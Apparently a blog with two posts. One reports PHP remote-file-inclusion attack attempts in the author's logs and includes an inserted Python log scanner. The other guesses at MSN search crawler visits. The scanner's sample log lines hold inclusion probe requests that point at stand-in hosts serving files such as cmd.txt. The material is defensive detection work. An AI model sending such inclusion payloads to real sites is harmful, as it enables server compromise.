19 Nov

PHP include attacks rolling on…

Posted by jerry as Hacking, Security, php, search engine, web site

I’ve written about this a bit, and I’ve started a current attack list on networkstike.com, but the intensity seems to be increasing in these attempts. I decided to google one of the URLs that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing. I believe these attacks are being launched from a botnet, trolling for vulnerable sites to use for some kind of illicit business.

What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google.  For a long time, I have gotten many hits with the referral set to a spammy site - an obvious attempt to get some clicks and link mojo with Google.   I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.

The current list of php inclusion hits for my sites is below:


I’ve started downloading the files and looking at them. Many of them are loosely copied off of one another, some are exactly the same. Some are quite complex, all-in-one shells, that would allow complete server control. Most of them appear to give some basic information, like directory, available disk space, effective UID and GID, and the like.
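For anyone who wants to pull the same kind of inclusion hits out of their own access logs, here is an added example (not code from this post's author): it scans Combined Log Format lines for requests whose query-string parameter carries a remote URL. The log lines, hostnames and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a remote URL is the signature of an inclusion probe.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, .invalid hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Nov/2007:10:00:01 +0000] "GET /index.php?page=http://payload.example.invalid/id.txt? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [19/Nov/2007:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://search.example.invalid/?q=x" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Nov/2007:10:01:00 +0000] "GET /gallery.php?dir=http%3A%2F%2Fpayload.example.invalid%2Fsafe.gif%3F%3F HTTP/1.1" 404 300 "-" "-"',
    '198.51.100.7 - - [19/Nov/2007:10:01:02 +0000] "GET /poll.php?id=3&inc=HTTP://other.example.invalid/cmd.txt? HTTP/1.0" 200 900 "-" "-"',
]

def find_inclusion_probes(lines):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        # Only the request target is inspected; the Referer field is ignored on purpose.
        _, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                hits.append({
                    "client": m.group("client"),
                    "param": name,
                    "payload": value,
                    # A 200 only means the script answered, not that the include worked.
                    "status": int(m.group("status")),
                })
    return hits

def payload_hosts(hits):
    """Count how often each remote payload host appears across the hits."""
    return Counter(urlsplit(h["payload"]).hostname for h in hits)

if __name__ == "__main__":
    for hit in find_inclusion_probes(SAMPLE_LOG):
        print(hit)
```

Legitimate parameters that carry a URL (redirect targets, feed fetchers) will also match, so review hits by parameter name before blocking on them.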

12 Nov

Strange happenings at Microsoft’s Search Engine

Posted by jerry as search engine

So, with all of the looking at logs I’ve been doing lately, I noticed something really unusual. Visits from hosts in the same range as the normal MSN bot that appear to be downloading whole pages (css, images, etc), which are referred from a search that looks like this:

http://search.live.com/results.aspx?q=myself&mrt=en-us&FORM=LIVSOP

The keywords keep changing, and they are landing at different sites. My theory is that MSN is going through and validating the search results for different terms, and analyzing the whole page - probably in an attempt to stop spam. I suspect that it is running through the entire index of terms that are associated with the site and “viewing” each in turn.

I’m seeing this activity for all of the sites I own and manage.

This appears to have been going on for about a week now. Hopefully MSN is on to something that will help reduce the amount of spam in their search results.